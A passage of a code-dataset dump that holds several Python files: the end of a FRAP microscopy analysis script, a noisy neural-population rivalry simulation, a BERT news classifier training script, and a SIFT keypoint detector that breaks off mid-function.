55 / 255, 114 / 255, 1.0]])\n viewer.add_image(organelle, name=('%s' % analyze_organelle), contrast_limits=[0, 1],\n colormap=('violet woBg', violet_woBg))\n\n # Layer3: aim points\n # display aim points from .log file (red)\n points = np.column_stack((log_pd['aim_y'].tolist(), log_pd['aim_x'].tolist()))\n size = [3] * len(points)\n viewer.add_points(points, name='aim points', size=size, edge_color='r', face_color='r')\n\n # Layer4: analysis spots\n # display bleach spots, color sorted based on corresponding nucleoli size\n # sort colormap based on analysis spots filtered\n if len(pointer_pd) != 0:\n cmap2 = 'winter'\n cmap2_rgba = dis.num_color_colormap(cmap2, len(pointer_pd))[2]\n if display_sort == 'na':\n cmap2_napari = dis.num_color_colormap(cmap2, len(pointer_pd))[0]\n else:\n cmap2_napari = dis.sorted_num_color_colormap(cmap2_rgba, pointer_pd,\n '%s' % display_sort,\n 'bleach_spots')[0]\n viewer.add_image(label(bleach_spots), name='bleach spots', colormap=('winter woBg', cmap2_napari))\n\n # matplotlib display\n if display_data == 'bg':\n if len(ctrl_pd_ft) != 0:\n if display_sort == 'na':\n pointer_sort = pointer_pd\n else:\n # sorted based on feature (color coded)\n # from small to large\n pointer_sort = \\\n pointer_pd.sort_values(by='%s' % display_sort).reset_index(drop=True)\n else:\n if len(ctrl_nuclear_bg_pd_ft) != 0:\n if display_sort == 'na':\n pointer_sort = pointer_nuclear_bg_pd\n else:\n # sorted based on feature (color coded)\n # from small to large\n pointer_sort = \\\n pointer_nuclear_bg_pd.sort_values(by='%s' % display_sort).reset_index(drop=True)\n\n if ((display_data == 'bg') & (len(ctrl_pd_ft) != 0)) | ((display_data == 'local')\n & (len(ctrl_nuclear_bg_pd_ft) != 0)):\n # Plot-left: FRAP curves of filtered analysis spots after intensity correction (absolute intensity)\n for i in range(len(pointer_sort)):\n ax1.plot(pointer_sort['mean_int'][i], color=cmap2_rgba[i + 1])\n ax1.set_title('FRAP curves')\n ax1.set_xlabel('time')\n ax1.set_ylabel('intensity')\n\n # Plot-middle: FRAP curves of filtered analysis spots after intensity correction\n # relative intensity, bleach time zero aligned\n for i in range(len(pointer_sort)):\n if pointer_sort['frap_filter_%s' % fitting_mode][i] == 1:\n ax2.plot(pointer_sort['real_time_post'][i], pointer_sort['int_curve_post_nor'][i],\n color=cmap2_rgba[i + 1], alpha=0.5)\n ax2.plot(pointer_sort['real_time_post'][i], pointer_sort['%s_fit' % fitting_mode][i], '--',\n color=cmap2_rgba[i + 1])\n ax2.set_title('FRAP curves')\n ax2.set_xlabel('time (sec)')\n ax2.set_ylabel('intensity')\n\n # Plot-right: offset\n if mode_bleach_detection == 'single-offset':\n for i in range(len(pointer_sort)):\n ax3.plot([0, pointer_sort['x_diff'][i]], [0, pointer_sort['y_diff'][i]],\n color=cmap2_rgba[i + 1])\n ax3.set_xlim([-10, 10])\n ax3.set_ylim([-10, 10])\n ax3.set_title('Offset map')\n ax3.set_xlabel('x offset')\n ax3.set_ylabel('y offset')\n","sub_path":"test/frap_analysis_nuclear-bg.py","file_name":"frap_analysis_nuclear-bg.py","file_ext":"py","file_size_in_byte":25425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506915786","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nEyeLinkSession.py\n\nCreated by Tomas Knapen on 2011-04-27.\nCopyright (c) 2011 __MyCompanyName__. All rights reserved.\n\"\"\"\n\nimport os, sys, pickle, math, thread, time\nfrom subprocess import *\n\nimport scipy as sp\nimport scipy.stats as stats\nimport numpy as np\nimport matplotlib.pylab as pl\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom IPython import embed as shell\n\nfrom tables import *\nimport pp\n\nfrom DataContainer import DataContainer\nfrom DataAnalyzer import DataAnalyzer\n\ndef simpleaxis(ax):\n\tax.spines['top'].set_visible(False)\n\tax.spines['right'].set_visible(False)\n\tax.get_xaxis().tick_bottom()\n\tax.get_yaxis().tick_left()\n\t\ndef spine_shift(ax, shift = 10):\n\tfor loc, spine in ax.spines.iteritems():\n\t\tif loc in ['left','bottom']:\n\t\t\tspine.set_position(('outward', shift)) # outward by 10 points\n\t\telif loc in ['right','top']:\n\t\t\tspine.set_color('none') # don't draw spine\n\t\telse:\n\t\t\traise ValueError('unknown spine location: %s'%loc)\n\n\nnr_variables = 5\n\ndef npS( input, mu ):\n\tinput[input < 0] = 0.0\n\tinput = pow(input,mu['NRa'])/(pow(input,mu['NRa']) + pow(mu['NRs'],mu['NRa']))\n\ndef func(t, y, mu):\n\timport pygsl._numobj\n\tfrom pygsl import odeiv, Float\n\tfrom numpy.random import randn\n\t\n\tdef S( input, NRa, NRs ):\n\t\tif input >= 0. :\n\t\t\t return pow(input,NRa)/(pow(input,NRa) + pow(NRs,NRa))\n\t\telse:\n\t\t\treturn 0.\n\t\n\tdydt = pygsl._numobj.zeros((5,), Float) * 1.0\n\t\n\t#defining variables based on indices on y\n\tH1, H2 = 0,1\n\tA1, A2 = 2,3\n\tC = 4\n\t\n\t# dydt[H1] = mu['XL'] - (1. + y[A1]) * y[H1] + mu['beta'] * y[A1] - mu['gamma'] * S(y[H2], mu['NRa'], mu['NRs']);\n\t# dydt[H2] = mu['XR'] - (1. + y[A2]) * y[H2] + mu['beta'] * y[A2] - mu['gamma'] * S(y[H1], mu['NRa'], mu['NRs']);\n\t\n\tdydt[H1] = mu['XL'] - (1. + y[A1]) * y[H1] + mu['beta'] * y[A1] - mu['gamma'] * (mu['var_inh_noise_infl'] * y[C] + 1.0) * S(y[H2], mu['NRa'], mu['NRs']);# - mu['var_inh_infl'] * S(y[C], mu['NRa_var_inh'], mu['NRs_var_inh']);\n\tdydt[H2] = mu['XR'] - (1. + y[A2]) * y[H2] + mu['beta'] * y[A2] - mu['gamma'] * (mu['var_inh_noise_infl'] * y[C] + 1.0) * S(y[H1], mu['NRa'], mu['NRs']);# - mu['var_inh_infl'] * S(y[C], mu['NRa_var_inh'], mu['NRs_var_inh']);\n\tdydt[A1] = ( -pow(y[A1],mu['exponent']) + ( mu['alpha'] * S(y[H1], mu['NRa'], mu['NRs']) ) ) / mu['tau'];\n\tdydt[A2] = ( -pow(y[A2],mu['exponent']) + ( mu['alpha'] * S(y[H2], mu['NRa'], mu['NRs']) ) ) / mu['tau'];\n\tdydt[C] = (randn(1) * mu['var_inh_noise_level'] - y[C]) / mu['tau_inh']\n\t\n\treturn dydt\n\ndef run_sim(mu, nr_timepoints, func, npS):\n\timport pygsl._numobj\n\timport pygsl\n\tfrom pygsl import odeiv, Float\n\timport numpy\n\t\n\tdimension = 5\n\tstep = odeiv.step_rkf45(dimension, func, None, mu)\n\tcontrol = odeiv.control_y_new(step, 1e-6, 1e-6)\n\tevolve = odeiv.evolve(step, control, dimension)\n\t\n\th = 1\n\tt1 = float(nr_timepoints)\n\t# initial values - all 0.\n\ty = pygsl._numobj.array((0.5, 0.5, 0.0, 0.01, 0.0))\n\t\n\top = numpy.zeros((nr_timepoints, dimension))\n\titers = 0\n\tfor t in numpy.linspace(0, t1, nr_timepoints):\n\t\tt, h, y = evolve.apply(t, t1, h, y)\n\t\top[iters] = y\n\t\t# add noise to instantaneous activity:\n\t\t# y += numpy.concatenate((numpy.random.randn(2) * mu['noise_level'], [0.0, 0.0, 0.0]))\n\t\t# add noise to novel interaction\n\t\t# y += numpy.concatenate(([0.0, 0.0, 0.0, 0.0], numpy.random.randn(1) * mu['noise_level']))\n\t\t# add noise to activities and to novel interaction\n\t\t# y += numpy.array([numpy.random.randn(1) * mu['noise_level'] * mu['var_inh_noise_infl']/y[4], numpy.random.randn(1) * mu['noise_level'] * mu['var_inh_noise_infl']/y[4], 0.0, 0.0, y[4] * numpy.random.randn(1) * mu['var_inh_noise_level']])\n\t\t# add noise only to novel interaction, but graded by the inverse of its value.\n\t\t# y += numpy.concatenate(([0.0, 0.0, 0.0, 0.0], numpy.random.randn(1) * mu['noise_level']))\n\t\t# add noise to both populations and transient signal\n\t\ty += numpy.array([numpy.random.randn(1) * mu['noise_level'], numpy.random.randn(1) * mu['noise_level'], 0.0, 0.0, 0.0])\n\t\t\n\t\titers += 1\n\t\n\top = numpy.array(op)\n\t# naka rushton on activities:\n\tnpS(op[:,0], mu)\n\tnpS(op[:,1], mu)\n\t# return both output and parameter dictionary\n\treturn [mu, op]\n\n# mu parameters based on dictionary\nmu = {'XL': 1.0, 'XR': 1.0, 'beta': 0.24, 'gamma': 3.0, 'exponent': 1.0, 'alpha': 3.0, 'tau': 100.0, 'NRa': 2.0, 'NRs': 1.0, 'noise_level': 0.0025, 'var_inh': 120.0, 'tau_inh': 50, 'var_inh_infl': 0.8, 'NRa_var_inh': 3.0, 'NRs_var_inh': 1.0, 'var_inh_noise_level': 0.005, 'var_inh_noise_infl': 0.0}\nnr_timepoints = 20000\nfile_name = 'data/C_noise_no_transition'\n\ncorr_res = np.zeros((4,4,8,6))\npnl_range = np.linspace(0.0001, 0.0003, corr_res.shape[0])\ninl_range = np.linspace(0.001, 0.01, corr_res.shape[1])\n\nsimulate = True \n\nfor i, population_noise_level in enumerate(pnl_range):\n\tfor j, inhibition_noise_level in enumerate(inl_range):\n\t\tmu['var_inh_noise_level'] = inhibition_noise_level\n\t\tmu['noise_level'] = population_noise_level\n\t\t\n\t\trn = 'pnl' + '_' + str(population_noise_level) + '_inl' + '_' + str(inhibition_noise_level)\n\t\t\n\t\twhich_var = 'var_inh_infl'\n\t\twhich_values = np.linspace(0.00,7.5,corr_res.shape[2])\n\t\t\n\t\t# Create an instance of callback class\n\t\tnr_simulations = which_values.shape[0]\n\t\tdc = DataContainer(file_name + '.hdf5') \n\t\tda = DataAnalyzer(dc)\n\t\tif simulate:\n\t\t\tdc.setup_for_simulation(nr_timepoints = nr_timepoints, nr_simulations = nr_simulations, nr_variables = nr_variables)\n\t\t\t# running these in parallel\n\t\t\t# Creates jobserver with automatically detected number of workers\n\t\t\tjob_server = pp.Server(ppservers=())\n\t\t\n\t\t\t# Execute the same task with different amount of active workers and measure the time\n\t\t\tfor index in xrange(nr_simulations):\n\t\t\t\tmu[which_var] = which_values[index]\n\t\t\t\tjob_server.submit(run_sim, (mu, nr_timepoints, func, npS), callback=dc.save_to_array)\n\t\t\t#wait for jobs in all groups to finish \n\t\t\tjob_server.wait()\n\t\t\tjob_server.destroy()\n\t\t\n\t\t\tdc.save_to_hdf_file(run_name = rn.replace('.',''))\n\t\t\tda.plot_activities(plot_file_name = file_name + '_act_' + rn + '.pdf', run_name = rn.replace('.',''), sort_variable = which_var)\n\t\t\n\t\tda.all_time_courses_to_percepts(run_name = rn.replace('.',''), sort_variable = which_var, plot_file_name = file_name + '_' + rn + '.pdf')\n\t\tcorr_res[i,j,:,:] = da.correlation_results\n\t\t\n\t# fig = pl.figure()\n\t# ax = fig.add_subplot(111)\t\n\t# cax = ax.imshow(corr_res[i], extent = (which_values[0],which_values[-1],inl_range[0],inl_range[-1]), vmin = 0, vmax = 1)\n\t# cbar = fig.colorbar(cax, ticks=[0, 0.5, 1])\n\t# cbar.ax.set_yticklabels(['0', '0.5', '1'])# vertically oriented colorbar\n\t# ax.set_ylabel('inhibition noise level', fontsize=9)\n\t# ax.set_xlabel('variable inhibition strength', fontsize=9)\n\t# pl.savefig('data/im_' + str(population_noise_level) + '.pdf')\n\t# pl.close()\n\n# # for a run of 1x10:\n# cr_m = corr_res.squeeze().mean(axis = 0)\n# cr_s = corr_res.squeeze().std(axis = 0) / math.sqrt(10)\n# \n# \n# f2 = pl.figure(figsize = (8,4))\n# s = f2.add_subplot(111) # , aspect = 'equal')\n# # s.set_title('simulation results\\ncorrelations between C and percept duration\\nfor %s' % sort_variable)\n# s.set_xlabel('Strength of transient signal [C] influence')\n# s.set_ylabel('Spearman\\'s $\\rho$')\n# s.axhline(0,-0.5,8.0, linewidth = 0.25)\n# s.plot(which_values, cr_m[:,0], 'k--', label = 'percept duration / C')\n# s.plot(which_values, cr_m[:,2], 'b--', label = 'percept duration / $\\sigma$ H')\n# s.plot(which_values, cr_m[:,4], 'r--', label = '$\\sigma$ H / C')\n# \n# pl.fill_between(which_values, cr_m[:,0] + cr_s[:,0], cr_m[:,0] - cr_s[:,0], color = 'k', alpha = 0.2)\n# pl.fill_between(which_values, cr_m[:,2] + cr_s[:,2], cr_m[:,2] - cr_s[:,2], color = 'b', alpha = 0.2)\n# pl.fill_between(which_values, cr_m[:,4] + cr_s[:,4], cr_m[:,4] - cr_s[:,4], color = 'r', alpha = 0.2)\n# s.axis([-0.5,8.0, -1, 1])\n# \n# leg = s.legend(fancybox = True)\n# leg.get_frame().set_alpha(0.5)\n# if leg:\n# \tfor t in leg.get_texts():\n# \t t.set_fontsize('x-small') # the legend text fontsize\n# \tfor l in leg.get_lines():\n# \t l.set_linewidth(3.5) # the legend line width\n# simpleaxis(s)\n# spine_shift(s)\n# pl.savefig(file_name + '_corr.pdf')\n# \n\n# shell()","sub_path":"versions/low_pass_noise.py","file_name":"low_pass_noise.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"124733466","text":"#knock89.py\nimport transformers\nfrom transformers import BertTokenizer, BertModel\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nmax_len = 20\n\ndef create_dataset(file_name):\n with open(file_name, encoding=\"utf-8\") as f:\n x_vec=[]\n y_vec=[]\n for line in f:\n y, sent = line.strip().split('\\t')\n x_vec.append(tokenizer.encode(sent, add_special_tokens=True))\n y_vec.append(int(y.translate(cat)))\n x_vec = ids2tensor(x_vec, max_len)\n y_vec = torch.tensor(y_vec, dtype = torch.int64)\n return x_vec, y_vec\n\nclass Bert(nn.Module):\n def __init__(self, output_size=4):\n super().__init__()\n self.bert_model = BertModel.from_pretrained('bert-base-uncased', return_dict=False)\n self.dropout = torch.nn.Dropout(0.3)\n self.fc = torch.nn.Linear(768, output_size)\n \n def forward(self, ids):\n seg_ids = torch.zeros_like(ids)\n mask = (ids > 0)\n _, out = self.bert_model(input_ids = ids, token_type_ids = seg_ids, attention_mask=mask)\n out = self.fc(self.dropout(out))\n return out\n\ndevice = torch.device('cuda')\nmodel = Bert()\nx_train, y_train = create_dataset(r'/content/drive/MyDrive/Dataset/train.txt')\nx_test, y_test = create_dataset(r'/content/drive/MyDrive/Dataset/test.txt')\ndataset = create_data(x_train, y_train)\ntrain_loader = DataLoader(dataset, batch_size = 64, shuffle = True)\noptim = torch.optim.AdamW(model.parameters(), lr=0.0001)\nloss_func = nn.CrossEntropyLoss()\ntrain_accuracy = []\ntest_accuracy = []\ntrain_loss = []\ntest_loss = []\nfor epoch in tqdm(range(5)):\n for inputs, target in train_loader:\n optim.zero_grad()\n model.to(device)\n inputs = inputs.to(device)\n target = target.to(device)\n outputs = model(inputs)\n loss = loss_func(outputs, target)\n loss.backward()\n optim.step()\n with torch.no_grad():\n x_train = x_train.to(device)\n x_test = x_test.to(device)\n pred = model(x_train)\n train_accuracy.append(calc_accuracy(torch.argmax(pred, dim=1), y_train))\n train_loss.append(loss_func(pred, y_train.to(device)).detach().cpu().numpy())\n pred = model(x_test)\n test_accuracy.append(calc_accuracy(torch.argmax(pred, dim=1), y_test))\n test_loss.append(loss_func(pred, y_test.to(device)).detach().cpu().numpy())\n\nplt.figure(figsize=(20, 10))\nplt.subplot(1,2,1)\nplt.plot(train_accuracy, label='train')\nplt.plot(test_accuracy, label='test')\nplt.subplot(1,2,2)\nplt.plot(train_loss, label='train')\nplt.plot(test_loss, label='test')\nplt.show()","sub_path":"ueda/chapter09/knock89.py","file_name":"knock89.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"493667700","text":"import cv2\nimport numpy as np\n\ndef SIFT(src, thresh, r):\n s = 1.3 #초기 sigma\n a = 3. #극점을 찾을 이미지 수\n k = 2. ** (1/a) # scale step\n\n lv1sigma = np.array([s , s * k, s * (k**2), s * (k**3), s * (k**4), s * (k**5)]) #double image에 적용될 sigma.\n lv2sigma = np.array([s * (k**3) , s * (k**4), s * (k**5), s * (k**6), s * (k**7), s * (k**8) ]) #Original size image #start : 2 * sigma\n lv3sigma = np.array([s * (k**6) , s * (k**7), s * (k**8), s * (k**9), s * (k**10), s * (k**11) ]) #half size image #start : 4 * sigma\n lv4sigma = np.array([s * (k**9) , s * (k**10), s * (k**11), s * (k**12), s * (k**13), s * (k**14) ]) #quater size image #start : 8 * sigma\n totalSig = np.array([s*k, s*(k**2), s * (k**3), s * (k**4), s * (k**5), s * (k**6), s * (k**7), s * (k**8), s * (k**9),s * (k**10),\n s * (k**11), s * (k**12)])\n\n #image resize\n doubled = cv2.resize(src,None, fx = 2.0, fy = 2.0, interpolation = cv2.INTER_LINEAR) #원본의 2배\n normal = cv2.resize(doubled, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #원본과 동일 size\n half = cv2.resize(src, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #반반\n quarter = cv2.resize(half, None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR) #1/4, 1/4\n\n # Gaussian 피라미드 저장할 3차원 배열\n lv1py = np.zeros((doubled.shape[0], doubled.shape[1], 6)) #6개의 Gaussian blurring 된 이미지\n lv2py = np.zeros((normal.shape[0], normal.shape[1], 6))\n lv3py = np.zeros((half.shape[0], half.shape[1], 6))\n lv4py = np.zeros((quarter.shape[0], quarter.shape[1], 6))\n\n print('make gaussian pyr')\n # Gaussian을 계산\n # ksize = 2 * int(4 * sigma + 0.5) + 1\n for i in range(6):\n ksize = 2 * int(4 * lv1sigma[i] + 0.5) + 1\n lv1py[:,:,i] = cv2.GaussianBlur(doubled, (ksize,ksize), lv1sigma[i])\n ksize = 2 * int(4 * lv2sigma[i] + 0.5) + 1\n lv2py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv2sigma[i]), None, fx = 0.5, fy = 0.5, interpolation = cv2.INTER_LINEAR)\n ksize = 2 * int(4 * lv3sigma[i] + 0.5) + 1\n lv3py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv3sigma[i]),None, fx =0.25, fy = 0.25, interpolation = cv2.INTER_LINEAR)\n ksize = 2 * int(4 * lv4sigma[i] + 0.5) + 1\n lv4py[:,:,i] = cv2.resize(cv2.GaussianBlur(doubled, (ksize,ksize), lv4sigma[i]),None, fx= 1/8, fy = 1/8, interpolation = cv2.INTER_LINEAR)\n\n #DoG 피라미드를 저장할 3차원 배열\n DoGlv1 = np.zeros((doubled.shape[0], doubled.shape[1], 5))\n DoGlv2 = np.zeros((normal.shape[0], normal.shape[1], 5))\n DoGlv3 = np.zeros((half.shape[0], half.shape[1], 5))\n DoGlv4 = np.zeros((quarter.shape[0], quarter.shape[1], 5))\n\n print('calc DoG')\n\n # DoG를 계산\n for i in range(5):\n DoGlv1[:,:,i] = np.subtract(lv1py[:,:,i+1],lv1py[:,:,i])\n DoGlv2[:,:,i] = np.subtract(lv2py[:,:,i+1],lv2py[:,:,i])\n DoGlv3[:,:,i] = np.subtract(lv3py[:,:,i+1],lv3py[:,:,i])\n DoGlv4[:,:,i] = np.subtract(lv4py[:,:,i+1],lv4py[:,:,i])\n\n # 극값의 위치를 표시할 3차원 배열\n extPy1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n extPy2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n extPy3 = np.zeros((half.shape[0], half.shape[1], 3))\n extPy4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n #Extrema의 위치 계산\n #lv1 pyramids\n print('find extrema')\n\n for i in range(1, 4):\n for j in range(1, doubled.shape[0]-1):\n for k in range(1, doubled.shape[1]-1):\n target = DoGlv1[j,k,i] #현재 Pixel\n comp = DoGlv1[j-1:j+2, k-1:k+2, i-1:i+2] #비교 범위\n #xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): #최대값이나 최소값이면.\n dx = (DoGlv1[j, k + 1, i] - DoGlv1[j, k - 1, i]) * 0.5\n dy = (DoGlv1[j + 1, k, i] - DoGlv1[j - 1, k, i]) * 0.5\n ds = (DoGlv1[j, k, i + 1] - DoGlv1[j, k, i-1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv1[j, k + 1, i] + DoGlv1[j, k - 1, i] - 2 * DoGlv1[j, k, i])\n dyy = (DoGlv1[j + 1, k, i] + DoGlv1[j - 1, k, i] - 2 * DoGlv1[j, k, i])\n dss = (DoGlv1[j, k, i + 1] + DoGlv1[j, k, i-1] - 2 * DoGlv1[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv1[j + 1, k + 1, i] - DoGlv1[j + 1, k - 1, i] - DoGlv1[j - 1, k + 1, i] +\n DoGlv1[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv1[j, k + 1, i + 1] - DoGlv1[j, k - 1, i + 1] - DoGlv1[j, k + 1, i - 1] +\n DoGlv1[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv1[j + 1, k, i + 1] - DoGlv1[j - 1, k, i + 1] - DoGlv1[j + 1, k, i - 1] +\n DoGlv1[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n #low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(),xhat)\n #edge response 제거를 위해 계산.\n #원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0,0]*H[1,1] - H[0,1]*H[1,0] # H 의 determinant\n tr = H[0,0] + H[1,1] # H의 trace\n threshR = ((r+1) ** 2) # r은 좌변에 따로 곱해줌\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): #low contrast, edge response 제거\n continue\n else:\n extPy1[j,k,i-1] = 1 #extrema & not low contrast & not edge response\n\n #lv2 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, normal.shape[0]-1):\n for k in range(1, normal.shape[1]-1):\n target = DoGlv2[j, k, i] # 현재 Pixel\n comp = DoGlv2[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n # xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv2[j, k + 1, i] - DoGlv2[j, k - 1, i]) * 0.5\n dy = (DoGlv2[j + 1, k, i] - DoGlv2[j - 1, k, i]) * 0.5\n ds = (DoGlv2[j, k, i + 1] - DoGlv2[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv2[j, k + 1, i] + DoGlv2[j, k - 1, i] - 2 * DoGlv2[j, k, i])\n dyy = (DoGlv2[j + 1, k, i] + DoGlv2[j - 1, k, i] - 2 * DoGlv2[j, k, i])\n dss = (DoGlv2[j, k, i + 1] + DoGlv2[j, k, i - 1] - 2 * DoGlv2[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv2[j + 1, k + 1, i] - DoGlv2[j + 1, k - 1, i] - DoGlv2[j - 1, k + 1, i] +\n DoGlv2[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv2[j, k + 1, i + 1] - DoGlv2[j, k - 1, i + 1] - DoGlv2[j, k + 1, i - 1] +\n DoGlv2[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv2[j + 1, k, i + 1] - DoGlv2[j - 1, k, i + 1] - DoGlv2[j + 1, k, i - 1] +\n DoGlv2[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy2[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n #lv3 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, half.shape[0]-1):\n for k in range(1, half.shape[1]-1):\n target = DoGlv3[j, k, i] # 현재 Pixel\n comp = DoGlv3[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv3[j, k + 1, i] - DoGlv3[j, k - 1, i]) * 0.5\n dy = (DoGlv3[j + 1, k, i] - DoGlv3[j - 1, k, i]) * 0.5\n ds = (DoGlv3[j, k, i + 1] - DoGlv3[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv3[j, k + 1, i] + DoGlv3[j, k - 1, i] - 2 * DoGlv3[j, k, i])\n dyy = (DoGlv3[j + 1, k, i] + DoGlv3[j - 1, k, i] - 2 * DoGlv3[j, k, i])\n dss = (DoGlv3[j, k, i + 1] + DoGlv3[j, k, i - 1] - 2 * DoGlv3[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv3[j + 1, k + 1, i] - DoGlv3[j + 1, k - 1, i] - DoGlv3[j - 1, k + 1, i] +\n DoGlv3[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv3[j, k + 1, i + 1] - DoGlv3[j, k - 1, i + 1] - DoGlv3[j, k + 1, i - 1] +\n DoGlv3[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv3[j + 1, k, i + 1] - DoGlv3[j - 1, k, i + 1] - DoGlv3[j + 1, k, i - 1] +\n DoGlv3[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy3[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n #lv4 pyramids\n for i in range(1,4): #0과 1\n for j in range(1, quarter.shape[0]-1):\n for k in range(1, quarter.shape[1]-1):\n target = DoGlv4[j, k, i] # 현재 Pixel\n comp = DoGlv4[j - 1:j + 2, k - 1:k + 2, i - 1:i + 2] # 비교 범위\n # xhat = np.dot(np.linalg.inv(H), dD) # true X(x,y,s) location\n\n if (comp.max() == target and target > 0) or (comp.min() == target and target < 0 ): # 최대값이나 최소값이면.\n dx = (DoGlv4[j, k + 1, i] - DoGlv4[j, k - 1, i]) * 0.5\n dy = (DoGlv4[j + 1, k, i] - DoGlv4[j - 1, k, i]) * 0.5\n ds = (DoGlv4[j, k, i + 1] - DoGlv4[j, k, i - 1]) * 0.5\n # (y, x+1) + (y, x-1) - 2 * (y,x) / 255 - 나머지도 똑같이\n dxx = (DoGlv4[j, k + 1, i] + DoGlv4[j, k - 1, i] - 2 * DoGlv4[j, k, i])\n dyy = (DoGlv4[j + 1, k, i] + DoGlv4[j - 1, k, i] - 2 * DoGlv4[j, k, i])\n dss = (DoGlv4[j, k, i + 1] + DoGlv4[j, k, i - 1] - 2 * DoGlv4[j, k, i])\n # x축 미분 값으로 y축 미분, x축 미분 값으로 s축 미분, y축 미분 값으로 s축 미분.\n dxy = (DoGlv4[j + 1, k + 1, i] - DoGlv4[j + 1, k - 1, i] - DoGlv4[j - 1, k + 1, i] +\n DoGlv4[j - 1, k - 1, i]) * 0.25\n dxs = (DoGlv4[j, k + 1, i + 1] - DoGlv4[j, k - 1, i + 1] - DoGlv4[j, k + 1, i - 1] +\n DoGlv4[j, k - 1, i - 1]) * 0.25\n dys = (DoGlv4[j + 1, k, i + 1] - DoGlv4[j - 1, k, i + 1] - DoGlv4[j + 1, k, i - 1] +\n DoGlv4[j - 1, k, i - 1]) * 0.25\n\n dD = np.array([[dx], [dy], [ds]])\n H = np.array([[dxx, dxy, dxs],\n [dxy, dyy, dys],\n [dxs, dys, 